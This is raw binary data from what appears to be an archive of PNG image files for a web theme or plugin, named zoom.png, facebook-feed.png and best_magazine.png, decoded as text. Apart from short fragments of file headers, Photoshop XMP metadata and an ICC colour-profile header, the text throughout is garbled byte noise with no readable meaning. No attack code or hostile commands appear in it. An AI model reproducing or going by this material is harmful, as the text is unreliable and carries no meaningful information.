�1�]�v��!x�&��#G���]]]���!��08?>�9,)����,$�(���Jڼ3@.k#��\4K2��4��_�lG)t�4��{�^�S$v���SŊ�&W�V�LM�A,̀�i���k� �Y5nf�^�����/�f�ݻW�4H%x�8ۇ���y����XD)�-�իWKCB��!F�F����͛7ؠ9p-|β�~1-�C�>W�ư;{N�[���V�l�F�60��j~OZ>acO�^�l|�5��E�X=Mbn�M����,7��i�Yx�c\���A֡s��i�*�.���9��z��&����~"���z���(��y�7��Ϳ�ȗL&K������d~�t���a���A~��L9�;��I�4"]�۲7�1�Qҩ�'�}�0Y��2ig>��W�{��|����CU�9��!�g���2{Y4�ߣ}uO3%�j����t:�0�
�Ke��aLM�B�G�k!�Р@���a��q��nW���K�B=k,��3�����F����`�����͉�\�"K��E?��Ÿ�\GI�S��Xc���px�������<��eU
V���#ź�b���V>�om�l��]k�j3 �D)Q���F�B��s(�20�sc<�����8�aNHfh���d@<��dZ�u>���9�U�P_�z;Cx��T0�1ɢ�?|��Wh���

��7�?r}��'lJ�Z��s ��Ӂ@HC@`��G��Ib�2(M�G~����p�epX�YQ�Ys�Ep�S�y7�s�`���I�x�ޱ�0?7�����
�5�c.$5���N�G��T��zi�#�D�3{��Zc'�n�F�8�Q�fÜ�H��I�؎9%a�)��xC0�61�GT�,A�4(&���r�7��p��"����f͑N{�bJ6Иg^A�
�V0g�3j����l��p�.M�C�l���l0�������V���6�톦H������\3! � �PNr�iif�7�8i���jc����,�w���N[��Ov*8̛�L��o@^��f�Ŝ.(�侤
��,ԥ,`�\��_���TS2��*�,�D��äe�Aʆ��Z��\��i����g�6�d3��L��=
i�h,�D��]s]�狦�Tv�+,@d
�¯���f�X�S�-��	�g�Ҳآ�yRlt~�wt&�(B�HL�T5�����N�A�d���۠L��
诃����+�0k+�����弝g��f]�Jj)M�*�(J��R)��TJ�(����/��� zL��IEND�B`�featured/images/zoom.png000060400000026240152434416630011312 0ustar00�PNG


IHDR��u�;<tEXtSoftwareAdobe ImageReadyq�e<niTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ba1a0bbd-1eda-3147-94f2-b3ae00a38842" xmpMM:DocumentID="xmp.did:90D932A3DFAC11E58487848D97712894" xmpMM:InstanceID="xmp.iid:90D932A2DFAC11E58487848D97712894" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02CC8E5FDEEF11E5B542ED907CC6C15A" stRef:documentID="xmp.did:02CC8E60DEEF11E5B542ED907CC6C15A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>V�>(�IDATx��}t��u�7�cPg�v��"��H�*���r����덳�9^o|��������$N�8k��Hvb��mI&)�"�^@@����f~��}HΓ.������}���ޯ��bȴL�7e�2-�Lˀ"�2�ȴ(2-�L�-M}�~	�*��J�2;I^B��$���$L2��~�N�v��z
�[�5�P(�!�����ht��Hd��p8,^�ϥϤ���>�kǔ���3��'�E��d�:�,���&~Λ�H�z�Hr�佄�-����W�H'y�d���(��z}���Uz=w'3ŝ
�e$�!�d�,,�F}z������g���(���(����k_�L}#%e����k�@�i�����N�5�c�
�_�B��[�����rD���;RT�T*�5�u:]�J�������)fqM�'�N򿧊�@`@�V�i����ǿ]�:Xl����OI����	���b�Bb��k0NX�3`2���o�+�$�q�k�Xc3�8��׳̩�ՠ�����˸���2�P�9�c�ezo���BE�-�#$U�G� sRI�8L�}�m^�����D�!��s�r8��!�8�=8�*))��@#�/">1�iI~��t�9��׳w��x��hS���
�3�H�&���ą~� �H�x���i�t�T�v�����EFݳw@�D�ߑ)ɦ��3����z"�ȴ9���`G����:����?�"u`�)I��_�E���܉��C��eԚ>C��Ia����>�ɝ��H�w@�Ý
�1
��G�`��>�ݝ}�!�5��q<�Oˆ�y2'k�}���Dbɨq~#��X�I�ًl*�&�:��ۓ�`����iy��X���H�`Fm�ǿ`3"�c��W������z���Q�˜fR��/�В��D�QׂCK��[�����2m��[�����?�N�+H�,���1���d��L��L[�&%�	�`3��<�HF-��-$`�{��
>|������y�E�0l����1�<WP��|3m����N��ӷ��odT�xق_	*֓f.
�m��K���GcE��0�	���c�@���鴰���5�ѫaի`А#(�����,�P��٫�`}=;ߠ��{�P��aO����v���!�M��b6�jТ���ͬE�A�\�V�j�A!E"�	����2ߠ؇xJ��iQR��D�ӏ�!7���Ճ�Q�G
D�9��h|Cf�\��9TڭXQ���v�,Zd8����
i^C�L��z���|��� ܁0��8�2����$f���
��^��*��h�pc�Q��
�d#`1�Q����5Ÿo�k�&X��4E��B2!(��}a6���
�\��#s��cx��gڇ1��SA�3
�d)$A��Q��*Q8 ���!%��
�bJ�4�G�A�AMY!v������
3����+~&��G�K�fm˖-KS<s/���D�0ު�FӠa�1s�!JN���[c�[tȵ�l$Œ��l��t�A�1�� ����ӣ@�˄�`�~?.�t�ڍ^\�^���*��*6S���$"g���8��W�6����O��p�5���K�c���� ؃��KrQ�_��,3z�MN�Dے"ؿp����ٍ�����h���|�\Z�1�c5YiG�U�V`�MHbۤ��35L=���
`@�Z׍���U�T�r`�r��sQS^$�����F|³��r�?�������o��q�JNDq�ۅ����c����G�[�Ol,CUvz�����(���X\ѼET�t�C��o~s&���	�[1D>����&"�1A�ӣ22�G�Ц�(������t�N���$0H��37��@@(�Ab6Q[Y���VF�P"-\��� �6��f�IZ���
v���z�#m$��󼼼�3�wm���‘�~��<D�0B��aU��]��;7���%�G��d��r{-B��$��|V�f5��_���1Kr4�g呙��ux����H�r���x�|
=ɞ��ۇ�ZCJ��0�F��Ъr"�8y�4FF��"9'ۊ�B;l6�P��ؘ`
A�	PH``�LfX,f����գ�g^�N8RYZjd5h��p�b:�Ӂ��4�"ς���S��'p6��N�ӟ*(xk�V��WR��R�NL��)]@C�k5�wx�/u<L�N�<�e�s$��AK���i�=vV�N�nC}[7�(z�*�aS(��j�F�����
kQ��
V�U�#*V�q��`4�t��9���g�GXY*�X[��=�6�%&��\����?�W.v��0�ڪ�Y�Ey��"���B�2��<�*(v��l�����q��':eL(JTٰ~Y%��	���?D#o׻��3<}�H�X�����BT��Pj˛P1�6��!?�
�#��o��ΡN�P(��+���-,w�;�H�0�t:q����\�}�v�n�cxxxl^�f3���/���.DTz:�J�u��s�hlr���lZ�
�*��
�u�p��c��L�!h�>�^Z���j���|ƃ%IE5;�YW;��ܡ�h����e�~��K�-�ľ
�̇�@��`����Z~{�ǯ����R�M�b¡Bi��j��w�rlZY
��V�kr�R�(�%�!FZ.c��
Tu��J�WƠQF�Q�Gs�b
��x��0��{p�<x��QPP���A��ct/��=�u}��;ĢN�2ˋ�g�c�(�0�8���y,��&O��arH9�1��cХ�PG~_׎���Gw�+	��Y�����4ل|7UPlJ1�wB�Z#d����W�lC�Ӌc��8�m-�F���A�/=�_�{���F8J7M�!�	E"_,�=��/����������ɇv�F�����c-��pP$U��臫�]�Y�.�ǖ�*�G��DXU���އӭ}���:
���g�5��"���}��'�]©�}�x�`�\<�g5>�k�Ht�("8�p����6�\g�R�0�O �GA�
VeMMM��F_8� ����W��y
L�1UG�S�%��BE��F�S{���
�� ��h$��.5���{��%L�����~��E�JRW��næ5X^V��,�0S�./��p�j��~�8B�������(�l�ą�Q�cG��
��r�#�6�-�(+��F���/s��~��.����m�l?z\�t���|<�g�x����]0QL�������v 7�s����߽�>N_m�g��n�Ғ/�"�8��Fh�j���Ct?x��bN-ݾfN~E�'�:2WP�MGxTe��<#]�R��$�7�Ox�l�^�䨭]R���/=�QoH����7�ѭ�XF^�=��>���7�0�w��/š�x�y�����;�`�6㙇����6���+JJ��0x�ȎU��㏒)���D�G(��F&≇�����$�v
!B,@����i�jd�҇GF�54*��
�l�b��
>�FZ�m}-��q����(]��|��|:g�����ז����g����v�+f
y�O��8G�
���Aё6��⹂�R�6�u D#p���xb�zh�)��5��GNchd99�x��۱���]��dN�MzT�aiI�o�}�E(N�p�֭X�Ehs��	E�oTP����ŠO}���&���(�)lN\�\.����}�1���o�"�s!H
��>���]�����(gfb���,Z%r�L7%���+�E+s�^
r�]0��0D�z�|��)<~z�z��t'._�ƖY;��z*PL�����<��B�WN��^#��6;�6������ƿ:��a(ɉܶv%����	���
��w��ݛI�J\�z
�.4�*)��F��Q[�v㑝�O �#��Q*���(�߿k֕�	��qፏ�{��p�,��k�„&;0�&d�#�̪Am��&�p���7�s���,(����6N׬10���t���O@�p���g_�=�^��(�~�Aܿ.^��@Q˙+MD�~,����]�P]�;�����죻����FD{���?����Dž*���e�	x$3����sʘVVk�[S;E�����9���a6�c	��	kC��1�f2`1�-�Q�$[�<�E�3�7!2�&-��p(]]�(����x�[Zi4���=xd�j�Yp��ԥz��9)2QcצZ�W;�]�R�qE���n��ƥ�QIn]�x�}�|�|NCi.c3ߨad3(����Aȟ�D����.����&O��҈œ�(�,=�TQ��EAπ�/�T�V�c*��O7[�N�y{ֆ�F��'.�ع:��(V/]�g܆���D:�+�Zș�ZQ[UJ#j��_vly"��"�.��/�tc��Lvu��K
��A>��X`#~��Y\T�EW>�6��,3��h��G�*�0��h�\*���`F�&?��փt"�9	��}
�� �a�fK��y��"�@�ux��I�9��0�͓�)�(a`��c�|
<�H��-O#{l��1N�}��x��c�eG�'���̇$�(7S�T@��:у���ht�	����hl��J�N��"H>���u�a�(�	�,g,^
��}�SE�w��:�|?�:���E��S�G!�jљ�Lh(L�Af�D�Y3�JV*G1�|.��Rx$p�;S�;�m�b�0�S)�."�s1��e�%��Iʼ�w�†��1�bN1�
����H�}p��������:]Wk�
���a��Ch��&�x��m�ԁ�k�I�$�:�o�C�!�칶�o(�4X��}T_0<�MGr�ܤH���d4�)�D�|�<�/��[�rr.$e�B^E�Zu���8�0�
')�Ҧ��>�f����_�;�/��Bش�O�ٌ
[�-kГ�c�]�����l>�.�8ǐ�eFU��|
7�#f%���K�gByJ�A��O(��	#"�{�i��:��o�Žqs�h+Nh������W�`�Pbʴ�S*�Hk�y��
Ͻq�(܇�;�ڷ
�VNq
xYe��\��x��o���Ж"�nb��M8�E9&(S�����&$P$O$%�nC##"�HL�U
�H�)_��HS����~�*輼䏎��/��Q�5
̺��#��O9c��v��l@�N(.����߾��AA�O?�o[#j &�1X�e�RQ��C靳��p�s��m���6IJ�Bl�)��JHLSkŬ��-�#/��G#r/��S����^ab����Xv��o�1qD��ɾLb��-�QE+>.)0��Sv�H�LZ᷄)2a�����7P�%[��p㗇O�l�U�5Z�ٲ^�<�1YccmuV�T�����x�ݳ�p��N~y��w�
eU��f�����W���s�܎�m�3���l)��I,f=Ό��k]^b��b���C�k8��xBM=^C�ޚc���sI��@`�fc���M>��ׄ����BM=k�9A�
o��q��±K8v������5�O�|�E�G�����=��D�l8����N�}�)&צj}�G�r�/=
9�Kˋ���'ˠEI�Y8��=5��p`��";;f��\y�6WTq��Ќ��]pz�d�5(�2bWm�֘ۃp"�a��)	)�+�|���E5z#z�8"�C���f����Kf
�!��d�L�:��R�:�J�<]�!����ؽ����bF�M2�/�6�G�����n<�}x�Z_~��_<�k=���Re�ޣ���־��~^!f����N��ހkjD2�ܢ�='�ۻ�V�q�c����w#�jYK��L���{�����y���0T��cY�IL��ȟ���9;�J���y^�2��
�R<�N�g$� ��$B ��Q���.�"^ܬ���,if
�	�8�
(�Se
��<j�zr�4�9�^~O�n�NE�|t�j�V��=�W�J�@�ш9v�-=CXYQ����!{η=�����3�N�]BQ���Oo_E
�!(����ĺ*;.\�F6��"��/N߀�s��X�eK*a�Xn���
�x�T#�7�!��l%@�8]g^n|N�s"HUqm'E$�xBN2|,���"N��
?9�A2O���d>�Fx�+?E3*����<K b�"%P�

�""
_�&+q�gZ{w��E��S(dq��}�X_aÊR�p?��6d�x��y�䧸��l���^Q���f�����;�:�Т�>2�<����1����e�TE�4\C�h�����\CCk'6�Y)J����9}!����f���G�,�ΚO����
�x`׶��9S��	/�xH*�r�yu�9E�DeȂWc�6F�i4���,l��O� 9w������`��T@ё*(�oZ!��u7��Q�sJ��'�ȃ�l&��]n����;a�p��#^��Fǔ	Hq]%�2�5�Eص�{7��-/�	�q�"ī�1��e�o��お��*�����^L��b卑�ov�h�֚�� %�-��};�H�x��I�}�.�g��J%�� i���n�6��P���F����&R�\t��'��H"׬��?���T@ў*(��Hͧ����yTS��g%x��HYQf�)�ͻ�|��N:f
ΑY����3�S�\ kb�,?ˊs�}�J��?pf�䏼�؃϶še��>�,/���*�{�Ad'jA��"�~���!�|0�¡4t+)��ã������^	&�2<4

#��B~R�����%��@4bQU^�pL�� �V۰���"1��Jй�L36�I�"%P� 
�����a���x�_!l�DS��6����8���G�W^����I���{]~�Y߃_�����Q(ܼ�;+r��j4��C7� J�	�l�[B��:���{O�P�X�c���|�޴F�`�ʳ��J�
�}�;�C
�92�:9����&�X�I�p�i��
ʳ4سԎ�\���B��[��͵�N�tL!��$�hI�ҕ�R)ӛ<�������<�8���K��q����c�P��oBI�Z�,��c���O�<}��Z"v�o�J|����!8G�.�#�X���944���z)�(#���%s ߚ�����胣�[f
��b�Q��;�DxlPF��Jl�ʿ�=U,3�B	S0ťT@��ݩ���\��ЃC
����#D��?P��!=Zwն,|~g
_mG�h-�8~	��T��4"�����Z��9,�T{YZ\���9"S�Jfi�:���.���>���f��X�On���U%�MP�<�KL'�̑T@��ܝ
^�Q�3�w�p�j�F��i��8uG�z�l3���-�3[�P8	����'�8�t�GtcmU�M#���Ҕ:3�<�%meȭ���Jr�7:P���"���-�G6U"ۘ��0|Ml�$�H�q��3�	���*ϝ�8�6LыK�C�Е'���7*��f��X��(~u�U�<V[��J�[x��e�=ch���1DÀ�n
`yQ6E6�[�$St�3��u'�Z� ޹ЀӣZ8��B�n<���l�F�՘@Lc:����:G��
����^8��
b�11�M!�"n��3��,XW�
�:&"��%f�45�"���l�fވ�o(pq�k�4�VbBm�
�%�bI#gHղYT����+M�dB����z��pnD���9�J�P�g‡7.���ʑkJ��Q�Zپ���Lv��'2`���N�o8�Vc?��F��n�3>r��r�ev��P��ˊ�B�k<E�=F�k�^?ׂ��=bŠK�yZܢU#��W�g@�F�Y�^-��<	�u�)"�`�A�L�Ç�9�J�(���Y=�[�����KD�iЪ���ة�]l�fp$�yp)�?Սи��],��[G|b��َ����ĕX[��x�4>��a.xXU��4:��*���/�jqpE��q�1�4t�wdL8���
(q��"�x`P+EŒ�9���I �ㅕ��QF��%YOa�����Qmǒ���HW����{�fo������	�`z\8�>�K�N1 �D�^�¦"����G	$+���ƆV�"oꢲl�[J���hD���׉��4w�`���h�d�����bu9���Q\E�Pq�U�h�V=�۳��4kJr�:�0��[�(E	X��fr�;j#4_�|g�	��dt;}�&!�T����r�R�+
���E�ˬK|a\t��Ý#b&�nP�yr:^Ր��' t�Y*#��Y��ƒ�VfHf	�y��d:$�Z6�4���f�]	e�B�b���o�Gp�k즙FV���P�ǵ�*��\�{��	g��̵���Z�-��*�Y;���ض�e�V<_ë�x�|E�E7�,d��P�$��}	�2ܞ_hPpA��xRr%��-�ӊ����ŷD��
�/�dž��[|�T���n֒��m�̵L��B2��oF�چ����!/~��@۰G�!D�p���ņ呂���K�2GL"��
�͍A���G���o�:�2��ҵ
3�F_�#{��f˜ˆ_5�bx`!�*�zS4Z-V�j��X��e��.or���b�����4�~�ގ�����-\ѕ�M��b��X���|��q�4�/1E���gs�ق�7����̏�1�H��3x����O�auuaO�{W��Ө��Il�-����ݨP(�%�)�	��:�6PL�o��:���9���t�|]�,���u��V`��b�!�C��D�A���ߓ����/�d���	��1	K��l�=��9�:j�F���[,fC�K�Hy�$}�^��1�����)�Q�<�6D'�VF-�\2CL���t)�C�$�s���zK$�"�]#ynN���%L��2*ZP��I����=�`y�.�w5-��`�_'��z��9���eʦ��L̨���Vb@�>��R.(�`i$�N,}{1e�~�@�I�K~�}C*�2$�Ϡi5�
SWe�7��'���N�K0xC�i��4Y�t�@�1#��9KL`6>3@̷���"ٻ�O�gZ
��K9 &a����O�y�Ls�w��A��V��Cyl!���H�!7��
�����,���
|�.�5�x�'!UfK���$�lK���b�Q����\`��!��G�O�8�y
�Q�{�n�ctcጏ1w�Rb�)��J�m����PN��9ʛ�}�n0����Τ�If>�jH�H������S̴��n�J�����6ybJeL�ܾ�;_פ��)��Mu:ݷ���3��5g*Y�p*�}��u>�k�A���D�^�4�B�:c.���e0;��C|���v�B0���C��^6'rs��)��L��q�S�b�E%sm?�z������j�rsr/�Cr�%s!���bU7^)�)���q���۫��t�	e���v�Hf9 ��Rr�e~O�����{�A��,cu���}�s6��ظ� gI���$�8J�1�bϝ
n��c짎��$_#`������9 �Y�#��!�s̱�n^A1�-B��
������LI��rpp�2�P�	� _�7��R��>��&1���5�a��:�?8���knz$�buH�+ؤ2E	䛈L�0���kH�w�HPȚ�:�OH~A�7����%�H~h�B$y)���NyD1��>ɗ�?bQ��
�5N��6���8Z$�I��6�C���dV�o'$y�a
0�!^�H�]��sfџ���:�K4�J ȓ?M8��ӓd�Ó��'��$f��>Ů���[:|��o��'/�G��p���c��?e���63)�ߓ�LR.$d20fE�3Bg��!������`����
w�PH�jR�GH��?�*�{�D��ә��v�O�|G�i�K�x_�_/T�9[P,F�1Y��%)�e)�K�>A�K�[L�dS2����)�ܮ��+	o�pǭ�����&e�~�Dr��Qzo�d�����^���SѼ����<���0�d�\B�����M���u�:����R��33N"��-����X1/'��Dys��$�$��o0�O����}`J����$^��B?	?:�����:�$��-��m�#��͖)�ʴ(2-�Lˀ"�2�ȴyi�_�����w��IEND�B`�featured/images/facebook-feed.png000060400000014257152434416630013005 0ustar00�PNG


IHDR��u�;<gAMA���a cHRMz&�����u0�`:�p��Q<bKGD�C�	pHYs��~�IDATx��y�e�ǿuuw��}��$�Hb !D��A�9e��P�QXPa1��p�C����pE��@ &ҙI&���tWWwU�GO����]]=��5G�>���T�{��y��y�K��qY|�$�n�]j��}�a��b\�n��I����B�/�������-��.A\�t�tXRd���(�Lsg"���L7�H"r<烝�ǮN�G
d���B��)�pN�w��b��uabtR)�F�	��V��dK7L�!G� xC)P�|�q�9��n窻��xTIQ� B���>K�w���߽t���	#�!�l��N��$R!DR��\pN

L�#���@��=��&��v��m�g�z�X�m
�+C�b�$�)
��Dɑ�[���Q����5e�R#�x�q�w�y[���*W%�7��d�wWB���(5$��Tद���SN؎�,^�m�EQ��/;9�J�<D�V�\(9�d�@mz?88��С�8N�m��,�P(��J
>��F��T��0*�U�"`V��^��;�m�iY��l�^�DR�� ek�,Bd[
�o�ラHG"�|�t���-�m{C*��+�L�ۻw�䅠I�v���i2\
\���J�8��eY�R�Լd2yw߾}�.W.��m���\�@�t�Rh��R���d��D"��A��\:T��Y)�•3�;�Ãn�röm,�"�L~�H$�0`�{A��EII��̖�K�ޤ%åcR���T*e'���D�C��o���ȶ4\"�Ę���A@N0Ms�a
2� �TR�!���]�A��&��W��@�0��
øe��ѩ ��.R��Cd+���0x�����	��a�&�a�a�y�F�����C�H��\���ٖ�t�a:�ϡ�pǕ��1��5z��*Y�R)u6�3��y�.)N��J���$	UU	�BD"�ёH�͍7Ωd�D
�q���;<���$�v�G���Ux@$F�=zF"��6l��R���W@�4K���_QU(}C�$Eq%��D~�~���*�w{I!��3��7U�2]
�,�� ߶nݺ˞o�
(��.��awW�,ˢ�A8�����Geͳ����WG\�R��&pu�p8L8FӴyk֬��l��IR��p�J��*�4/����p]�i�ň��)�4Ϝ0a‹��˗�(��RT.e`*i?D�%��xj��JUU�'jkk��:/_���ϙ��BT,����ઢ�-��OoEQ�Z�zu�R��[R����Q���f�+A�a�B!TU'��#�h�d��EI�q��W��d]�$!�2����8]��kJ���@fAe�0�M t�uضM2�$���H$�eYGM�8qy{�n��*;N�UBT����!I��F����Ί
phЍ�� Z#M�@��ɒ$��YX���71	XBZZT,�"�Hd��4M۶�뺾��izJ�,�C�_R%D�p����"$I�v�َxs�S�n��qq�!I�	�h�kmN3ߋ+�C�w]O�Q�H��M�$���0˲V;�3E���y��$�Y�	�o�:UBt��BUUE�|�M�
�c�UX��1�h�m�i���H"����z@�u=YLZ�aϣJ�WZ���*�H�t0i�^��d��)l��A�
�~������g�{u5Uf�q�9G2vd���P2��o���`Y������#%��t4�L�z�]�k5NO{��#�?�˨a}��N� *���J�N�u}��t<�?7��o����/�7�N�Ƹ�}OTt;E�!!���C�o�H�&�����ϲw����!N<j��FQ�I�<�e������櫲C$�K
�q�D��A����ꑸ���:Nzَ���� �,I\p�a|�k���|��q�>�~��t�v�?i�hȲ�Y.H�0�
����GR�
�AVv�{kYU�=���v��u���	���*AW�t�aY��F_���dE�����M�vbф�p�WZH��J�c���(?i��SȤO��0��
	V�m�<Ϝ:��3�U��YC��?oGg
gYɕu�[Xg�<�M�8l޾?ȪT��Hp�����&��8=�ガ���S'�6f$y���Y�b��R��'�|�����?�3"��8.�Ft]7��Q4g�v��jn���~��>��+�Yӻ�J�!J�&Ӵ'�|�+��U�
f1��C�&�~� �5wZ�E.Db�|����+�	3����g�{�
s����R3�5U&V;��}a"!�k�� J�&IiU��x��hr`��r~�{_�j����c���]���!)�(��I:�NzQ�]W��\zEFD��^q��r]
1�G�^β���%�,)���D�B��.�)3���{_�uw�R�E}"��"�؊�P$ş1�k_��8A���Č�V��H������qP�iǞF6mmv0m�q�6߾$KRN�!�5�u�cKh���ɱ�f���L3��'�w*��zY�#*Uʸ��,��w�<�L�4<')���ؑ�Y�� ���ǖ�Mg�!�y�i��l���n�.����=���0i�`�O��@f��O6Q�n'��ŰA5}�h�n}<�eټ��&�6�F�`�!1��͛G��̸)���M��cKx�:�0�"sٹG�}����۟'e�>cU�v����\~�L ���vߛ����Va?w�Pn��$�����Vn����Z�
�e��L��s��i��F���e��-׸̘2���qb.!ró_���V�,,zo���2�{o��ԉ�6i8���+L7�W��pC���^�!��nj�Ǘϙ'��M��v?��R��i�>~t�l��H�^a.9{?��X&��m;��x����z�kB؋�}i23��`���<���J5�OR������<Gs�����c�g�8TEn�3���I����%f$[���l�[���l JC����>���'r�����C��'�C]N݆],�p�g��O~�Y�w��ĴC��㞠s��e�yf9�:������i�Q�r���f���,�O~X�6m�`f�x�k!I����&ЯO���!jz�|�E�#Z&���[���0�Ǥ�a��Q��8eVK/�IG7[o�D��NS�a�j2���T������7ظe�%��_��B��h�tz�(�l'���i��.߀���f���O?8=:n��|�uw��,7�/���)Č$@ZW��el����Z�M�Cj)�5U��Q��{�6*�^^/���E�v5�a˾̳K
��3���g��?��A5�}�dd!p���:���@U��v�0F
�"7�\����S�{����B�h i�J���W�]��[Qd&�NO�&�Y_�Œ)--63i�b�Vz�����}qB��
ߝ�*�-;p��`���W�mo�('�k6�.[;z"���NQZ7�O���ٻߠ!f�3I��{4�f&~C̤n�.��ſgޏ����1{f�)����[h�
	~x�|���y��Rp�o��K�[�t�g|���\��O�0S3mLF��O2+���Ҍ�Z.�	�8�$E�
]�����+���ͫ�eIb�ġ\v�L�4�3�e+73��lں�3ܬ#��������‹o���G���1�ȱ����7���GӔL�͝�K�ٳ?��w/b�ɓ9�+붳�ݵ؎Ì)#�T�
�����E��{o��]��c�lڶ�E�K	WBض�m����R���S�;Bz�k�V�W�*2�{����^��b�6�����W����w��~͖Y2es��KX���V���ߙ�t���7����?ֶ�ev���'�}!ci$�7�_ěK׵wΩSد'�=����#<w�%kO�b��d����]��k!R�|�d%�����+�/ƍ��Cw���ݥ7>ŧk���C*7^q'|>���{��Y��Vv�iDU��a���HDԮ�E�~'1#Iߚ0S'cĐܧPG�w��n;�,q����3i���Z&���:i,��03���뺮���B�x�6���VD�w�}W��O�����Q�^}��V�����K��y�<~0�r��(Bgj�¤��[�d�A*��0���R)��꺞�_��+]��AS�E�H2����1<d�{�qx^i�ՑK���)�y�/d}��@�6���}�š���J&��k�$h��A��@�yH�ٯ�H�q���x������I
I�v�YQZEY J��3��I�Y�uO7�����|�����mR�TFRd�B�❠+Y��R"���v�4���bpo%L�R�HQ�?��b)|�Ut���#)b���I!I��t��(w���':��Y�l��U�cEFS;i��µ:R�T�9��g���u�J�k�+���̩#3�/W~�h¡n�`��I�c�p�����u%I��8�;t�Q��~��u��K�d2�o�xW�M~�*F?tŽ`u��R��U0��df���W�~�G�jr�=��Md��Np�.)r	�O~��M
I�v;��p~�
�}w#�ܰ�d�Ž���b�(%\R�P0��u�A�Ū��[v(H��8���m��u	�սŤY)$Iz��r�aҸ�y����̜��++��0p�R�4�|Rby1w}���jEض�MI���i����%�{Qm<�4�\V�E��?TL�E{��yX[l�*J��izI�z�b�.���$ǹ5�F���E�<�ĭ��4m<�߶�G�	�`���s��")�P<Җ<�D
UUS��$��p'cmx�ڶ�^��CQ�'�y1�F�N��D"�i��&���u�ɶ�Ӯ�F˲~�8Nuu ���D"s�dB���ړW�H�iڧ�m�^�3�HC�	�G��/]�W�'�v/LH�R�9�ӮBT�
W�p	�΄� �*���nRD"3�J}ö��0R��4M�h!%�`꺞hC6-P�%L�px�eY7�т�h#���lB��o�u�$G�l]�i��,�z��_���a�ax���*U�%݅����/
-SUu\9O���pu�2{�0���z`���{J�IW�����5Msn*�:P�m�HWBx���R�pmMM�
�4�M�R���QD�҇�H�뺾�
Yy�,k�kjj^J$W�R)�J�.!�D>B8����P���mE�޽�O$�x��U��S�CB\���*SYw�����׆a�T%Fn��0�/!n�u���,WEL�ݻw�(��4Mr�Z��W`��J�43GzH�����P1�q�ΝW���4MSTU�u_f��8��M��,�J]��D+�+۶m���B=UUEQ�|��u9�'ʸ����o�]]��)~���OW���͛7��B�њ���F�t	������z��J�@zb�ƍ�C���P�P(�+5�9��\��~D�;!��-fO�X�[�N�4�P�P(����eȑM�6�@Z������ڋ�[~����k����ic]�!��{SP��vp.2�[�򜀛i�[��zHL�h�k�֨��UU�]�4Y�44MCQ���#�C<�ز��:]"����!�
���u������׮]{��(wk�v������H��@�쳯]2�{:E��c���J�w�P:)jkkeY��UQ�[UU�'�G��Vң�$ɾ�K<�Е�G�7x�a+p#��j��Ñ�EmmmOY��'�򵊢t��(9rI� "Q�H#v�x�g6D� �B�~<N����[�y�`�%��իW�H��Y���ey�+)r�ADrd_暏�!��6w�v���.�Ѩ*I�ْ$].��$I���E�\�"�U�ٝ�M�7DpH��eb�NC
�ht�$I�K�t���^D�J�ٝ�qMt6�?����vJR��F�3�3��$I�	�^CF>�J���I�d�"����NO
�ht�cgǐ�)���6��3�=`1�l��Il]�وF�20���c���` ���z5}��Ʀ�]�-�m�Fҫ��+��͌���*����*����*��|�'S8�6�ng(IEND�B`�featured/images/best_magazine.png000060400000362001152434416630013134 0ustar00�PNG


IHDR=
`䂈	pHYs��
MiCCPPhotoshop ICC profilexڝSwX��>�eVB��l�"#��Y��a�@Ņ�
V�HU�
H���(�gA��Z�U\8�ܧ�}z��������y��&��j9R�<:��OH�ɽ�H� ���g��yx~t�?��op�.$���P&W ��"��R�.T���S�d
�ly|B"�
��I>ة��آ���(G$@�`U�R,����@".���Y�2G��v�X�@`��B,� 8C� L�0ҿ�_p��H�˕͗K�3���w����!��l�Ba)f	�"���#H�L����8?������f�l��Ţ�k�o">!����N���_���p��u�k�[�Vh�]3�	�Z
�z��y8�@��P�<
�%b��0�>�3�o�~��@��z�q�@������qanv�R���B1n��#�Dž��)��4�\,��X��P"M�y�R�D!ɕ��2���	�w
��O�N���l�~��X�v@~�-��g42y�����@+͗����\��L�D��*�A�������aD@$�<B�
��AT�:��������18
��\��p`����	A�a!:�b��"���"aH4��� �Q"��r��Bj�]H#�-r9�\@���� 2����G1���Q�u@���Ơs�t4]���k��=�����K�ut}��c��1f��a\��E`�X&�c�X5V�5cX7v��a�$���^��l���GXLXC�%�#��W	��1�'"��O�%z��xb:��XF�&�!!�%^'_�H$ɒ�N
!%�2IIkH�H-�S�>�i�L&�m������ �����O�����:ň�L	�$R��J5e?���2B���Qͩ����:�ZIm�vP/S��4u�%͛Cˤ-��Кigi�h/�t�	݃E�З�k�����w
�
��Hb(k{��/�L�ӗ��T0�2�g��oUX*�*|���:�V�~��TUsU?�y�T�U�^V}�FU�P�	��թU��6��RwR�P�Q_��_���c
���F��H�Tc���!�2e�XB�rV�,k�Mb[���Lv�v/{LSCs�f�f�f��q�Ʊ��9ٜJ�!�
�{--?-��j�f�~�7�zھ�b�r�����up�@�,��:m:�u	�6�Q����u��>�c�y�	�����G�m������7046�l18c�̐c�k�i�����h���h��I�'�&�g�5x>f�ob�4�e�k<abi2ۤĤ��)͔k�f�Ѵ�t���,ܬج��9՜k�a�ټ����E��J�6�ǖږ|��M����V>VyV�V׬I�\�,�m�WlPW��:�˶�����v�m���)�)�Sn�1��
���9�a�%�m����;t;|rtu�vlp���4éĩ��Wgg�s��5�K���v�Sm���n�z˕��ҵ�����ܭ�m���=�}��M.��]�=�A��X�q�㝧�����/^v^Y^��O��&��0m���[��{`:>=e���>�>�z�����"�=�#~�~�~���;������y��N`������k��5��/>B	
Yr�o���c3�g,����Z�0�&L�����~o��L�̶��Gl��i��})*2�.�Q�Stqt�,֬�Y�g��񏩌�;�j�rvg�jlRlc웸�����x��E�t$	�����=��s�l�3��T�tc��ܢ����˞w<Y5Y�|8����?� BP/O�nM򄛅OE����Q���J<��V��8�;}C�h�OFu�3	OR+y���#�MVD�ެ��q�-9�����R
